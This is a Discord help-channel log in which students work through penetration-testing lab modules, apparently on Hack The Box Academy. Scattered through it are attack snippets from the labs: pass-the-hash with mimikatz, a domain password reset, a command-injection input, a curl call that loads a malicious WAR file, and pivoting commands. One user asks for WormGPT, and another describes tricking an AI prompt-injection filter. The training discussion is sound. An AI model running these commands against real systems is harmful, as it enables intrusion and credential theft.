fathom pendant
#

typically there's instructions at the top of or just above the question that provides instructions on connecting to the target

#

can you share a link to the module?

keen canopy
#

yes

fathom pendant
#

just as i thought

#

there's instructions to rdp to the target just above the question

#

(there will be the ip between the words "to" and "with")

keen canopy
#

so what do i do with that

fathom pendant
#

... you RDP to the spawned IP with the username "wifi" and the password "wifi"

#

the pwnbox should have xfreerdp installed

dull solar
fathom pendant
#

yeah, lots of basics missing

#

RDP [remote desktop protocol] is a remote protocol to connect to machines, generally supplying a GUI to work from

keen canopy
fathom pendant
#

well for one the Information Security Foundations Skill path teaches a lot of the basics

fathom pendant
#

you kinda just leaped forward a bit

opal shuttle
fathom pendant
#

not saying you wouldn't be able to complete it, but you're just gonna have 10x the struggle

#

there's also a BUNCH of more basic wireless pentesting modules

dull solar
#

'Wifi Password Cracking'

#

rather than 'Wifi Pentesting Techniques'

opal shuttle
fathom pendant
#

¯_(ツ)_/¯

#

haven't looked, nor cared to look, at it

fathom pendant
opal shuttle
#

i also just checked..so my student subs willnot cover that

fathom pendant
#

nop

opal shuttle
#

but it was fun

keen canopy
dull solar
fathom pendant
opal shuttle
#

😂

fathom pendant
#

it's a joke

keen canopy
#

💔

#

i didn't see what else was available with the student membership

opal shuttle
#

he would have watching youtube vidoes right now if he wanted to hack neighbours wifi lmao

keen canopy
#

clicked on the first thing i saw

opal shuttle
#

just take a path

keen canopy
fathom pendant
opal shuttle
#

lmao

#

3gb is insane

keen canopy
opal shuttle
#

isnt it useless?

fathom pendant
#

3Gb?

keen canopy
fathom pendant
#

anyway this is straying off-topic

#

the top of the list @keen canopy is generally gonna be the "latest" module

opal shuttle
#

why you have 3gb connection..do you distribute internet to neighbours?😂

keen canopy
opal shuttle
#

i am sitting here with 100 mbps connection

fathom pendant
#

ANYWAY TO REIGN IN FROM OFF-TOPIC COUGH COUGH

opal shuttle
fathom pendant
#

if you wanna continue the conversation in another channel, @keen canopy you'll need to link your hackthebox account to the discord via the instructions in #welcome

opal shuttle
#

or you can dm me

ionic hedge
#

guys, I'm currently practicing user management and permissions in the linux fundamentals module, and I have a weird issue in my VM. so I created two users dr_luna_cosmos and morgan_nebula, I created a folder telescopes and inside it, user morgan_nebula added a file telescope1_maintenance_log.txt
Now, I'm logged in as dr_luna_cosmos through su command and I can't edit that file, I keep getting "Permission denied" error in nano. But all of the permissions look right, that user should be allowed to save this file... What is happening?

vapid maple
#

Need help with the VPN. I built a new Kali box and when connecting to the VPN I loose connection via SSH/RDP

#

does anyone know if HTB uses the IP range 192.168.10.0/24?

#

appears so, I may need to reip my entire homelab 🙁

rich marsh
#

Why can't I text on general?

storm elk
lunar lagoon
#

Yo guys. Real quick question. Basically my school doesn't have an IT department and since I'm the only one in my school who knows a little bit about computers they asked me to "control" the WiFi and make sure no one uses it for bad things.
I was looking for an easy app or something like that so I could control the WiFi remotely from my android. Any recommendations?

cloud urchin
#

@normal vigil This isn't the server for that type of discussion.

raw ibex
#

PLS HELP ME, Hello, I think I found the answer to the first question in the “Antak Webshell” section of the Shells & Payloads module, but it's not accepting it. I've tried all possible patterns, but it's not working. Could you please help me?

silk hazel
#

I'm doing the File Transfers module and maybe I missed it, but why would somebody prefer cat foo.bin | base64 -w 0 rather than base64 -w 0 foo.bin ?

heavy mango
silk hazel
safe robin
#

im solving **Using the Metasploit Framework **

the question is

Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer.

i got the shell but

(Meterpreter 2)(unknown) > whoami
[-] Unknown command: whoami. Run the help command for more details.
(Meterpreter 2)(unknown) > dir
[-] The "dir" command requires the "stdapi" extension to be loaded (run: `load stdapi`)
(Meterpreter 2)(unknown) > 

please help

safe robin
#

i did but still

safe robin
#
(Meterpreter 1)(unknown) > shell
[-] The "shell" command requires the "stdapi" extension to be loaded (run: `load stdapi`)

safe robin
# storm elk Enter “shell”
(Meterpreter 1)(unknown) > load stdapi
Loading extension stdapi...
[-] Failed to load extension: uninitialized constant Rex::Post::Meterpreter::Extensions::Stdapi::Stdapi
Did you mean?  STDIN
(Meterpreter 1)(unknown) > shell
[-] The "shell" command requires the "stdapi" extension to be loaded (run: `load stdapi`)
(Meterpreter 1)(unknown) > 

#

wht

median kettle
#

@velvet geyser either or, depending on your skillset, you may find it better to do boxes first. most boxes ive done didnt require much in terms of using socks

#

can i get some help on password attacks for the assessment. i need a hint as to what i may or may not be doing right

cosmic patrol
#

https://academy.hackthebox.com/module/315/section/3771
please could someone help me for this. i always get this

curl -X POST http://127.0.0.1:8081/workflows\?url\=http://127.0.0.1:8000/pwn9.war
{
"code": 500,
"type": "InvalidWorkflowException",
"message": "Failed to parse yaml."
}

i follow all instructions but, nothing💔 I've literally finished all the module except this part. I can't take it anymore.

this is Model Deployment Tampering of the Attacking AI - Application and System module in the AI red teamer path

please help me

cloud urchin
#

You need to follow the instructions in #welcome to get access to other channels.

fathom pendant
#

apt list | head and you'll get your answer

cunning fern
fathom pendant
#

also try not to spoil/reveal answers @cunning fern

cunning fern
#

oh sorry i couldve used || || right

fathom pendant
#

no

#

spoiler tags really don't do shit as anyone can click on them

cunning fern
#

doesnt spoiler tag rly talk for itself

fathom pendant
#

that's not really the point i'm making lol. Doesn't take from the fact that anyone can still click on it and reveal the answer. This is a server with aspiring hackers, human curiosity is the biggest thing here

cunning fern
#

ok i understand it all now thanks for the nod

frank bloom
#

I want a link to enter WormGPT, please and thank you

quiet heart
gaunt forge
#

on any of the ai prompt injection defense modules, you can set your system prompt so that the "key" equals a slur, than the key wont be given out at all since the censoring system works so well lol

quiet heart
gaunt forge
#

thats how i passed all 3 haha

quiet heart
azure grove
#

Anyone give me a hint on Windows Lateral Movement > WinRM > Question 3? I can't seem to get around the double hop problem to get to DC01 as Leonvqz despite performing PTT on SRV02

edgy knoll
#

How many firewall rules are enabled? in pentest in a nut shell module

cursive pelican
#

Hi Guys, I'm preparing for OSCP but before buying the course I'm planning to study HTB Academy Penetration Tester Job path role. Can anyone suggest me what are the modules should I study in HTB Academy which will be helpful in the OSCP exam?
Thank you!

cloud urchin
#

Wouldn't that require knowing what's on the exam?

iron pelican
sharp wyvern
#

hey everone i had a quick question im not sure if i should ask in plain text or with log to avoid spoiling anything? its like the first step tho so i dont think it will be an issue , so my question is when trying to ssh even myself i get denied (publickey) and cannot figure out how to have it make me a private set 😭, im using a virtualmachine of parrot

sharp wyvern
#

this is the original attempt and can scroll down a bit too if you need lmk

quiet heart
#

Use the target IP not 127.0.0.1 😄

sharp wyvern
#

i thought the target was the password, that makes alot more sense tho

#

igy gangy ty

candid star
#

Hey everyone, struggling on the Password Attacks skills assessment.

I found creds for hw on the JUMP01 box and the creds indicate I should be able to get into the FILE01 box with the creds. However I’m unable to RDP into file01 with the creds

#

Anbody open to giving me a few pointers?

quiet halo
#

When will DNS use TCP instead of UDP?

#

"When the connection with UDP fails, typically when the packet size is too large to push through in a single UDP packet"

#

can the packets just be split up?

alpine mural
#

Hello! Someone in Skills Assessment of Attacking AI?

fathom pendant
#

It uses both

quiet heart
shrewd minnow
#

Hi all, I've been doing the 'ACL Abuse Tactics' section of the Active Directory Enumeration & Attacks module. I got stuck on the part where we change the user damundsen's password by following the examples. Set-DomainUserPassword cannot find the user at all, even though
functions such as Get-DomainUser and net user are able to find the user's info. I've tried using both the SID and DN instead for the -Identity arg but they also dont work.

The commands I used so far:

$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
civic inlet
proven plinth
shrewd minnow
#

i have the correct password but still unable to find

proven plinth
#

I was able to replicate your error by using a wrong password for wley

shrewd minnow
#

even with the correct password for wley which i got from the previous sections, i'm still unable to change damundsen's pwd

proven plinth
#

After correcting the password, the output should look like this

#

If you are certain you have used the correct password, consider resetting the entire lab environment

#

If you are still stuck you can DM me

raw ibex
raw ibex
proven plinth
golden halo
#

Hey guys, I need help:
Module: Password Attacks
Section: Skills Assessment

Problem: I was able to login to jbetty and searched around until I found some credentials for the user for FILE01 ssh. The problem is that I'm trying to ssh to file01 using that user but it just gives me a blank line without asking for the password. I tried all methods looking for other credentials but wasn't able to find anything, am I just going completely wrong? I saw a walkthrough online that said to use proxychains for enumerating then pivoting but this wasn't mentioned at all in the modules (only in the pass the ticket from linux section), when I tried following that method I had so many errors saying that the channel couldn't open so I'm not sure its the right method.

Any advice?

limber surge
#

does anyone have this issue when doing the icmp tunneling with SOCKS , in the ubuntu server, when you try to run "" sudo ./ptunnel-ng -r10.129.202.64 -R22 """

And you got the error regarding libcrypto so 3? How to resolve? i was using the sandbox environment that they gave.

merry stone
hybrid pilot
#

Moin, quick question regarding the Skill assessment for Pivoting and Tunneling.

I'm using my own Kali VM with the VPN profile (tried both TCP and UDP).

So I know what I'm supposed to do but I'm hitting the part where I need to do the pivot and I cannot seem to grasp how I can make proxychains/port-forwarding work.

So if I do ssh -D 9050 ... and run proxychains nmap <IP> --top 25 -sT -v -Pn all ports show as filtered.

I then tried to use metasploit and I have this setup:

msf6 auxiliary(server/socks_proxy) > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
SUBNET => 172.16.5.0
msf6 post(multi/manage/autoroute) > run
[*] Running module against inlanefreight.local (10.129.66.195)
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.129.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 172.16.0.0/255.255.0.0 from host's routing table.
[*] Post module execution completed
msf6 post(multi/manage/autoroute) > sessions 1
[*] Starting interaction with 1...

meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.129.0.0         255.255.0.0        Session 1
   172.16.0.0         255.255.0.0        Session 1
   172.16.5.0         255.255.255.0      Session 1

meterpreter >

but I hit the same "filtered" wall. am I missing something or is this a HTB VPN + proxychain quirk?

proven plinth
#

All I can say for certain is the problem isn't on the ssh target

hybrid pilot
proven plinth
#

My own Parrot VM doesn't

hybrid pilot
#

oh wait what..? I misunderstood.. I'm not even using Pwnbox tho. I'm using a local KaliVM..

proven plinth
#

But I haven't had the time to revisit this issue yet.

#

Most likely it's some settings/version issue... I guess, lol

hybrid pilot
#

Instead of ssh -D 9050 ... and meterpreter I also tried sshuttle -vv -r webadmin@10.129.66.195 172.16.5.0/24 --ssh-cmd "ssh -i id_rsa" but then running nmap or similar reports ALL ports as open instead of filtered.

#

this SA drives me nuts

autumn pilot
#

Try using sudo with the proxychains nmap command, e.g., sudo proxychains nmap....

proven plinth
hybrid pilot
proven plinth
hybrid pilot
#

sudo proxychains ... seems to be the solution

proven plinth
merry stone
#

I am doing Skills Assessment - Password Attacks
after initial access, i rdp into jump01 with the creds found and I am stuck here, any hints please?

proven plinth
#

No sudo needed on my Parrot VM. The problem could be version specific.

rare flicker
#

O

proven plinth
merry stone
crystal maple
#

info

proven plinth
proven plinth
merry stone
#

np

hasty mauve
hybrid pilot
drowsy lotus
#

Hi folks, can anyone give me nudge for Password attack skill assessment?
I got the creds of hw and I can do rdp to JUMP01 as well as found shares using nxc on FILE01

sharp pecan
#

hi all

#

FILE UPLOAD ATTACKS - Type Filters --- anyone has done this module

hybrid pilot
opal shuttle
#

and check what you can do with that

#

if you want more help you can dm me

dreamy linden
#

Why can't I talk in general?

fiery light
#

Is anyone free to assist with the pass the certificate part of password attacks module? Stuck on the administrator part, able to get the certificate but unable to do anything with it as it says invalid password or PKC12 data

acoustic owl
rain mirage
#

what is the reason of this error ?

mimikatz(commandline) # sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe
user : julio
domain : inlanefreight.htb
program : cmd.exe
impers. : no
NTLM : 64f12cddaa88057e06a81b54e73b949b
| PID 7720
| TID 7724
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS

mimikatz(commandline) # exit
Bye!

lone ferry
#

Attacking common web applications- Splunk section. Target machines have no connectable endpoints but show ports open. Been this way a week. Any info appreciated Edit: prtg connects but splunk web server no go. Ports show open as in the walkthrough only prtg is connectable

autumn pilot
#

Which port is shown as opened?

fair merlin
#

How do I even connect?

hybrid pilot
#

--skip-ssl ?

fair merlin
#

Oh! I tried --skip_ssl my bad! Thank you

digital pendant
# lone ferry Attacking common web applications- Splunk section. Target machines have no conne...

you should have a similar nmap to mine

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
8000/tcp open  ssl/http      Splunkd httpd
8080/tcp open  http          Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
8089/tcp open  ssl/http      Splunkd httpd
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
#

connect with https://IPhere:port instead of http too.. probs that

crude grove
#

yesterday the host 172.16.5.5 wasn't up and I spent 2 hours trying to solve the question
thinking i'm missing something
but no ,today I ran nmap again and voila it's up
question solved 5 minutes

i never thought of restarting the machine, will this happen to me when I start the exam?
I need advice for the exam

digital pendant
digital pendant
#

Did anyone manage to get a reverse shell off PRTG outfile.ps1 executable method ? I can't seem to get anything back to my netcat listener. Attacking Common Applications - PRTG Network Monitor

heavy mango
digital pendant
#

tried two different pshell oneliners now, maybe i need a different list of payloads then if you got it to work!

heavy mango
#

Could be

digital pendant
#

ty tho... i can keep digging now

hidden ledge
#

Hello ! Can someone give me a little tips for this question in the Footprinting module in the SNMP section: " Enumerate the custom script that is running on the system and submit its output as the answer." ? Thanks 🙂

digital pendant
#

The resources tab on Reporting module has Sample Report.zip, but I can't seem to unzip it, "The archive entry was compressed using an unsupported
compression method."

any ideas? windows errors out and linux says I require a PW for the file

final kite
#

For lfi skill assessment. I did exactly as I saw in walkthrough but doesn't seem to work when I inject she'll I get internal server error

gray field
#

Android Application Malware Analysis.
Unraveling Embedded Custom VM. I followed steps-by-steps. But I can't get a flag.
Here is what I did:
Installed pedometer.apk on the Android emulator.
Launched the app and granted the Physical Activity permission.
Set the emulator to Charging mode.
Enabled Airplane Mode when the step counter showed 12, 13, or 14.
Switched Charging → Not Charging in the emulator battery settings.
Increased the step counter until it reached 86 steps

I can't find what i did wrong..

opal shuttle
#

hii guy i am stuck at file uplaods modules...anyone willing to help?

frigid python
#

From the Linux Fundamental course i am unable to get the correct answer the question is what is the name of the network interface that MTU is set to 1500?

#

Can any one help me

median kettle
#

@frigid python use ifconfig

viscid epoch
#

Advanced deserialization attacks - Example 1

the PresentationFramework is not there, when I click show potential solutions

any hints ?

terse bloom
#

Hello people, login brute forcing module, login forms. I have modified hydra to match the pattern, but it stops at 16 results out of 3400 and doesn't go anywhere for more than 10 minutes

viscid epoch
grizzled schooner
#

Quick question on Inveigh - trying to use it for AD Skills Assessment PT 2 -- I can't get SMB Capture to switch to enabled. Any idea how I do this?

frosty crescent
#

I'm doing AD Skills Assessment II and I couldn't find the credentials for "Use a common method to obtain weak credentials for another user" so I looked it up and all the write ups say "just password spray for password X" now I'm wondering how was I supposed to know that

grizzled schooner
frosty crescent
#

There's like 3000 users, password spraying just one password takes like 20 minutes

#

So was I supposed to spend hours on this? I don't get it, the password policy doesn't help at all in guessing this

quiet heart
grizzled schooner
#

For the future, I wouldn't spoil something like that. I'm actively working on this assessment and module, and that just kind of gave away what I'm supposed to do

opal shuttle
quiet heart
opal shuttle
#

i am trying .pHp it got uploaded successfully

#

but my code is not executing

quiet heart
#

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst

For example, this list

opal shuttle
opal shuttle
#

my code is not being executed

quiet heart
opal shuttle
#

nothing works

quiet heart
opal shuttle
#

its just blank i am not getting anything in output

#

@quiet heart bro i am about to shutdown my pc and pls help me to figure that out?

quiet heart
viscid epoch
compact iron
#

Guyss any red team?

opal shuttle
opal shuttle
median kettle
#

can anyone help with password attack assessment? im stuck on a point and need a nudge

grizzled schooner
#

Whatcha got @median kettle

median kettle
#

@grizzled schooner so i managed to pivot to the internal host (jump) and found a file i wanna look at, problem is, its an excell spreadsheet, and i am not sure how to view it since the machine doesnt have excel, and i only have terminal access to the dmz

grizzled schooner
#

Hmm, I don't remember needing an excel file

median kettle
#

it says online passwords, so i figured it would be worth peeking at, ive tried looking at cmdkey /list and windows cred vault. not seeing anything.

#

i have noticed two applications for password storage, however i am unsure of what to do with them.

grizzled schooner
#

What applications are you seeing?

median kettle
#

password safe 3 and remoteNG

grizzled schooner
#

I will tell you you're staring at the answer then. Look more in to those applications, what they require, what files you have and haven't searched for

median kettle
#

check ty

grizzled schooner
#

Gotchu

grizzled schooner
#

Oh I'm pissed - when using kerbrute to make a userlist - I outputted to a text file - but it includes timestamps, domain, date, whether or not the username is valid or not... Is there a way to get rid of that?

heavy mango
grizzled schooner
#

ty

dark jay
#

hello can anyone help? i am doing cbbh using proxies module and can i ask question here?

median kettle
icy egret
#

hello guys, I am in File Upload Attack module, which i am doing blacklist filter, it is asking my to upload a file which is not in blacklist, i did upload, but when i visit uploaded file, it just reading back the content of the code, how can i make it work?

dark jay
#
  • 1 Try using request repeating to be able to quickly test commands. With that, try looking for the other flag.
    doing the ping burp suite and i do this command ip=1; find /* -name *.txt it found 2 flag.txt but they are the same i already found 1 and i need to find the second one also flag.txt
dawn current
#

🤚 Looking for a long-term U.S. partner — great rewards await. D!!!M if interested!

dawn current
heavy mango
#

doesn't matter

quartz sundial
#

help me understand the error please

I'm going through the module https://academy.hackthebox.com/module/255/section/2911 (Live\Ghost SPN-Jacking)

I'm specifically performing a Live SPN-Jacking attack. I deleted the SPN from one of the hosts, assigned this SPN to the target host. Then I requested a ticket and changed its SPN, everything as shown in the Module. There were no authorization errors when receiving a ticket and no errors when changing the SPN in this ticket. But when trying to connect via WinRM, an error occurs, the ticket is deleted

What am I doing wrong?

gaunt oyster
#

did anyone face a issue where using ligolo-ng crashes the domain controller in the AEN module for the double pivot?

grizzled schooner
#

I've been password spraying for the last 1.5 hours... can anyone help me out for Q4 on AD Enumeration and Attacks | Skills Assessment Pt2 please @ with replies

versed wadi
#

academy modules give you an example of simple/common password

grizzled schooner
#

I'm using that pw lol

#

I've been going for probably the last hour and 45 mins now - although I'm running it against jsmith, because that's all I had that made sense

versed wadi
#

if I remember it correctly I used user account to dump users with ldap and then used common credentials to password spray

grizzled schooner
#

No user I have can dump anything... but I'll look again I guess

proven plinth
grizzled schooner
#

Wouldn't shock me - I'm not cut out for this, but spent enough money figured might as well finish out the modules lol

rustic sage
#

How to get retired htb boxes's writeups in pdf format

dawn current
#

Partner up with me 😀 in the U.S. — long-term, rewarding, and worth it. Message me!

heavy mango
proven plinth
grizzled schooner
grizzled schooner
versed wadi
#

Usually you never have to bruteforce for more then 10 mins tops not even talking about an hour in any module

heavy mango
#

<@&861185840277487616>

grizzled schooner
versed wadi
#

You got it just try using ldap since you are on Q4 you already have what you need to enumerate domain users

grizzled schooner
#

I tried ntds, lsa, sam and lsass -- got errors on all 3 for perms

#

also tried --loggedon-users with nxc got nothing

versed wadi
#

maybe try users flag on nxc

grizzled schooner
#

...goddamnit

proven plinth
grizzled schooner
#

Sometimes I love you guys, other times I hate you lmfao - I had to restart my lab sesh anyway, will give that a try

versed wadi
#

Yeah hackthebox always makes us scratch our heads dd

proven plinth
grizzled schooner
#

lmfao

versed wadi
#

Pentester path was one of the best courses I have done in a while honestly

proven plinth
#

The AD skills assessment is one of the best designed skill assessments I've done so far

grizzled schooner
#

<@&861185840277487616> can we get this dude to stop? Like the 4th time they've mentioned this

storm elk
#

@dawn current please read #rules

tiny frigate
#

How's that dude not getting banned

quasi wave
#

hi for the Kerberoasting - from Windows section of AD Enumeration and Attacks, I am having trouble with the second question. So the program they tell me to use has a syntax error. Its written in Python. I would use Python2.7 like they are telling me but I have Python3 version of it installed. But when I run the program (kirbi2john) there's an syntax error. This is the same program they are telling me to use. It should work ideally. This is the program that converts the other file I generated from other output into a format that can be cracked by password cracking program.

#

so the Python script built into Kali won't run

#

can someone help me with this?

#

I can't get more specific without spoiling it

#
Traceback (most recent call last):
  File "/usr/bin/kirbi2john", line 50, in <module>
    if et:
       ^^
NameError: name 'et' is not defined. Did you mean: 'set'?```
frigid python
quasi wave
#

I tried running kirbi2john in python2.7 and got this:

└─$ python2.7 /usr/bin/kirbi2john crack_this.kirbi 
Traceback (most recent call last):
  File "/usr/bin/kirbi2john", line 22, in <module>
    from pyasn1.codec.ber import decoder
ImportError: No module named pyasn1.codec.ber
median kettle
#

@frigid python ip link show (interface name here)

heavy mango
quasi wave
heavy mango
#

I mean a Python venv

quasi wave
#

but its not the assessment

#

its question 2 of kerberoasting from windows section of AD enumeration and attacks

#

so about half way through the module

#

is where this section is

#

I completed question 1 this is in order to answer question 2

#

@heavy mango can I DM you later maybe you can help me with this one on one? I'm scared if I get too specific I'll spoil the information which I have already been yelled at on here for.

heavy mango
quasi wave
magic holly
#

I’m stuck in Bash Scripting (Easy) is this the chat to discuss code and questions?

desert widget
#

@languid fjord I have sent a DM to you, kindly have a look at it.

raven wadi
#

Password Attacks
Module Pass the Certificate
What are the contents of flag.txt on Administrator's desktop?

fierce marten
#

hey I have a problem in the file upload module whitelist flag , I got the flag but it didnt works

grizzled schooner
grizzled schooner
#

Now nxc and CME just time-out when attempting to do anything lol

compact patrolBOT
magic holly
rose stratus
#

I'm currently doing the AEN section but I'm not able to get bloodhound data using bloodhound-python or bloodhound-ce. I've never had issues with these commands up until now. The module uses Sharphound to collect the data but I prefer to use the former methods. Can anyone confirm if they are experiencing the same thing?

stiff helm
#

hey was doing the "Android Application Static Analysis " module, got to the part of "Reversing Hybrid Apps" where i now compllty stuck on the first question where we need to analyze "myapp_hybrid1.apk" some one also doing this/ or did this already?

wild sage
jolly oasis
#

Does anyone have a second to help me with https://academy.hackthebox.com/module/109/section/1038
"Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found. "

I've confirmed with my notes and reset the target machine. Can't get the command to run at all no matter what I do. Tried Linux only as well as Linux and Windows command bypass characters.

wild sage
#

Did you find the flag in the previous section?

jolly oasis
wild sage
#

okay, try using some other possibly blacklisted bypasses from that section and the preivous section

jolly oasis
wild sage
#

if you were able to get the directory from the previous section, try using a bypass again. I'll give you a hint, you've probably already used one. The other is in that section's reading

#

if you're still stuck you can pm me

icy grotto
#

I'm doing the pillaging section in windows
I have the cookie and admin priv. Whenever I enter Grace's cookie in the site nothing happens to the page.

#

Firefox also after a certain amount of time detects the cookie plugin and disables it

strange gale
#

Guys what do I put as my proxy address for my ubuntu server?

wild sage
#

Yes we discussed

cosmic tinsel
#

Hello

#

Is anyone available to ?

#

Talk

gaunt elbow
#

hello can i get a help on the nosql skill assessement 2 ? || i know that the username is passive of injection because when i modify the javascript the this.username for this.any the application respond with a 500 ||

cloud urchin
cosmic tinsel
#

How can i bypass the last section

cloud urchin
left needle
#

Hi I have completed section "Credential Hunting in Windows" from "Password Attacks" but I have few questions I didn't search anywhere directly dumping them here

  1. Why did LaZagne's cmd window closes automatically when task is completed??
  2. And if I didn't use findstr and manually did searching and also findstr didn't give all the files that are useful
  3. What is the right way to do the lab??
soft moon
#

its for https://academy.hackthebox.com/module/143/section/1508
could someone please give me a bit of assistance as im a bit confused why a password isnt working for this
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

as for the command the password in the section but not the 1 above
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240

soft moon
#

am I meant to break the password from the impacket lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 ?
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)

#

I too have that same question, dont have enough knowledge to provide help

fathom pendant
#

@heady sapphire don't reveal answers

#

sometimes a tool can miss something

#

that's why it's important to know multiple methods to gather information

fathom pendant
soft moon
#

when I go back for a second round of the pathway going to read re the note I left from this convo

soft moon
#

so there is no route to the host... something wrong with the VM module?

└──╼ $impacket-lookupsid logistics.inlanefreight.local/htb-student_adm@172.16.5.5
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

Password:
[] Brute forcing SIDs at 172.16.5.5
[
] StringBinding ncacn_np:172.16.5.5[\pipe\lsarpc]
[-] [Errno Connection error (172.16.5.5:445)] [Errno 113] No route to host

soft moon
#

ok so it was wrong with the HTB VM...
└──╼ $ping 172.16.5.5
PING 172.16.5.5 (172.16.5.5) 56(84) bytes of data.
64 bytes from 172.16.5.5: icmp_seq=1 ttl=128 time=2.95 ms
64 bytes from 172.16.5.5: icmp_seq=2 ttl=128 time=0.513 ms
^C
--- 172.16.5.5 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 0.513/1.733/2.954/1.220 ms

gaunt oyster
#

In AEN module, I exploited SysaxAutomation and added the ilfserveradm user to the local administrators group. But I still cannot access the administrator flag. Any help?

fleet pawn
#

hi guys , for password attacks skill assessment. https://academy.hackthebox.com/module/147/section/1356 i need to get the proxychains going ,
i have used ssh -D 9050 user@<DMZ01> command and have it running it a different pane
reinstalled proxychains and have socks4 127.0.0.1 9050 under the [ProxyList]
but it somehow isnt working, my most basic nmap scans with proxychains are giving no results

soft moon
#

i think with proxychains and nmap you got to use -sL

#

my brain is super fried doing AD module

fleet pawn
soft moon
#

ok let me grab my notes and see

#

what the URL ?

fleet pawn
#

which one

soft moon
#

yours should be the URL of the skills

fleet pawn
#

u need to go skill assessment passoword attacks and lauch target . thats the DMZ01

soft moon
#

ahhh its passwords attack module

fleet pawn
#

yes

soft moon
fleet pawn
#

oh got it , didnt know what u meant by URL

soft moon
#

... its the link at the top of a webpage...
https://en.wikipedia.org/wiki/URL

URL

A uniform resource locator (URL), colloquially known as an address on the Web, is a reference to a resource that specifies its location on a computer network and a mechanism for retrieving it. A URL is a specific type of Uniform Resource Identifier (URI), although many people use the two terms interchangeably. URLs occur most commonly to referen...

timber falcon
#

guys is anybody doing bug hunting

#

or starting it

soft moon
#

so where you up to ?

timber falcon
#

are you asking me?

soft moon
fleet pawn
timber falcon
#

I also need some help with it, I want someone to tell me how do I get started

timber falcon
#

that's private

soft moon
timber falcon
#

yes

#

I have started with htb modules, thm also

#

but kinda lost

soft moon
#

I would recommend doing THM first then once gaining more skills come back to HTB

#

its quite rough out here on HTB

timber falcon
#

oh surely

soft moon
#

im about 72% done on the CPTS pathway but only understand about 40% or so

timber falcon
#

what's cpts

soft moon
timber falcon
#

oh VAPT basically but htb certified

soft moon
#

oooo my bad miss read and brain still fried

soft moon
timber falcon
#

VAPT is a skill, also known as vulnerability assessment and penetration testing

soft moon
timber falcon
#

hey btw what's account identifier in htb

autumn pilot
timber falcon
#

yes but I cannot find anything named account identifier

soft moon
#

its a long road for you...

timber falcon
#

then fill up a little gas in my vehicle, I'll be grateful

autumn pilot
#

Browsing to the mentioned link there you will find the account identifier

waxen totem
fleet pawn
timber falcon
waxen totem
fleet pawn
#

no ports are showing up as open in all 3 ips

waxen totem
fleet pawn
waxen totem
fleet pawn
#

instead of an nmap , is there anywher to check if the proxychain is working or even setup properly

waxen totem
#

alternatively just transfer a static nmap binary, yo won't have scripts but it'll be good enough

fleet pawn
#

meaning run nmap on the remote DMZ01?

waxen totem
#

yeah, you could also just use metasploit's nmap/proxy

rose lagoon
#

Hello I'm stuck in the Footprint ( CPTS ) in the DNS section we have to find an FQDN can you help me I tried everything

quiet halo
#

lookup the name server of the domain and you'll see it

#

there's two but htb is asking for one of them

stiff totem
#

.

young portal
#

Hello world

small elk
#

Hello everyone

young portal
#

I'm new and I would like to learn hacking, is it possible?

#

or here I can learn cyber security

compact patrolBOT
acoustic owl
#

@stiff totem @small elk @young portal
Hello everyone,
This is not the #general chat.
Please read #welcome and #faq to find out how you can gain access to #general.

stiff totem
#

Ok

acoustic owl
stiff totem
#

Role pls

acoustic owl
stiff totem
#

I can't understand can you tell me how I can do?

scarlet dock
#

Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.

hi guys, if i download the file.zip and then i submit the hash the exercise say that it is not correct
i saw also write up and the hash it's the same
hints?

small elk
#

I can't find my account identfier

rose lagoon
#

@quiet halo I don't get it

acoustic owl
rose lagoon
#

can someone help me in the footprint for DNS where we have to find the last FQDN

acoustic owl
#

What exactly do you mean by „last FQDN“?
What is the question in the module?

rose lagoon
stiff helm
acoustic owl
rose lagoon
acoustic owl
quiet halo
rose lagoon
# quiet halo what command are you running

|| for sub in $(cat /opt/seclists/Discovery/DNS/subdomains-top1million-5000.txt);do dig $sub.inlanefreight.htb @10.129.42.195 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done||

quiet halo
rose lagoon
hasty mauve
#

Module: Windows Lateral Movement
Section: Skills Assessment
Question 2: What's the content of the flag located at C:\Users\Arturo\Desktop\flag.txt

I found the || notes.txt || with the IPv6 for || WSUS || along with a password, probably for || Arturo ||.
